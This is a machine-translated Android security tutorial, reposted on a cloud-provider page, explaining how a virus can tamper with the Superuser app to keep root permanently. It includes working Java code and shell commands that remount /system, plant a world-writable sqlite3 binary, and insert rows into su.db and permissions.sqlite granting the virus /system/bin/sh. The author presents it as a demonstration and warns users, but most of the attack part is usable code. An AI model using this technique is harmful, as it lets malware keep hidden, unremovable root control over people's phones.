Basic knowledge about Android 32: security issues after the Android mobile phone root (III)

Source: Internet
Author: User

This article describes how a virus can tamper with a superuser so that the root permission of a virus request is allowed to be permanently used by the virus.

Continue with the previous two articles. If you have any questions, read the first two articles first.

In other words, your fake.apk must copy the application to the system. This requires the root permission. If the user allows you to copy a root request in front of the user, the system will send a broadcast after the copy, informing you that a new APK is installed, anti-virus software will find you.

Yes, this is indeed a problem, but the virus is a virus, and you will always find a way to make you ill. Don't worry.

Superuser records data to the database. Why does the virus not modify your database? If the modification is successful, it will not be permanently granted the root permission, and you will no longer be needed to approve me. I will approve it myself!

Unfortunately, if the virus gets the root permission once, the above mentioned things can be done completely.

Let's demonstrate that there is a superuser installed on my mobile phone and the version is 3.0.7.

I also installed a re manager.

First, open the re manager. At this time, the Re manager Requests the root permission. The superuser will pop up a prompt asking whether the user permits

Before clicking "allow", select "remember" and then allow.

This step is used to obtain the data that should be inserted in the superuser database when the application obtains permanent root permission.

Then we export the database

/Data/COM. noshufou. Android. Su/databases there are two databases that need attention.

Su. DB

Permissions. SQLite

The following uses permissions. SQLite as an example to describe the table structure:

Then let's see how the virus modifies the data.


Virus only needs to care about several fields

UID, package name, application name, exec_uid = 0, exec_cmd =/system/bin/sh, allow = 1

There is no doubt about how the virus gets its own package name and Application name.

Activitymanager. runningappprocessinfo contains uid Information

The following code obtains the UID of the current application.

public static int getUid(Context context,String packageName){ActivityManager activityManager = (ActivityManager) context.getSystemService(Context.ACTIVITY_SERVICE);List<ActivityManager.RunningAppProcessInfo> runningAppProcesses = activityManager.getRunningAppProcesses();int size = runningAppProcesses.size();ActivityManager.RunningAppProcessInfo runningAppProcessInfo = null;for (int i = 0; i < size; i++) {runningAppProcessInfo = runningAppProcesses.get(i);if(packageName.equals(runningAppProcessInfo.processName)){return runningAppProcessInfo.uid;}}return -1;}

Well, this table has been done, and Su. DB is almost the same as this, so it will not be demonstrated.

The last question is how to modify the database in the mobile phone. Obviously, we use sqlite3, but some mobile phones do not have this problem, so the virus may be bound by itself, then copy to system/bin or system/xbin.

Where does sqlite3 come from? Yes .. For example, you can generate a copy from the simulator pull.

Okay, all done.

Finally, we will take two steps.

1. Prepare the sqlite3 file, just in case

prepareButton.setOnClickListener(new View.OnClickListener() {public void onClick(View v) {File dataFolder = getFilesDir();    File sqlite = new File(dataFolder.getAbsolutePath() + "/sqlite3");    copyFile("db/sqlite3", sqlite, mResources);}});

2. Apply for the root permission. Once successful, modify the database.

String sqlUpdateSu = "insert into apps (uid,package,name,exec_uid,exec_cmd,allow,dirty)" +                              "values (\""+ uid + "\",\"" + packageName + "\",\"" + name + "\",0,\"/system/bin/sh\",1,0) ";  String sqlInsertPermissions = "insert into apps (uid,package,name,exec_uid,exec_cmd,allow) " +                                                      "values (\""+ uid + "\",\"" + packageName + "\",\"" + name + "\",\"0\",\"/system/bin/sh\",\"1\") ";    String[] commands = {"busybox mount -o remount,rw /system"                              ,"ls /system/bin/sqlite3 || ls /system/xbin/sqlite3 || busybox cp /data/data/" + packageName + "/files/sqlite3 /system/xbin/sqlite3 && chmod 777 /system/xbin/sqlite3"                      ,"busybox rm /data/data/" + packageName + "/files/sqlite3"                      ,"sqlite3 /data/data/com.noshufou.android.su/databases/su.db '" + sqlUpdateSu + "'"                      ,"sqlite3 /data/data/com.noshufou.android.su/databases/permissions.sqlite '" + sqlInsertPermissions + "' "};  

Run

From now on, the virus is out of your control and cannot be cleaned up.

Conclusion

This blog is only used for demonstration, so it is not strict.

For example, before using superuser for the first time, its database tables may not be created, so some SQL operations may fail.

I don't plan to write a complete virus, so some people will want to do something unclean. Learning and communication only

It seems that every time you approve the root user, you have to go to the superuser list to see if there are any exceptions.

Please do not use the root mobile phone to download software at will, or use any excuse to create any virus!

References:

Security issues after Android mobile Root
(3)"

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.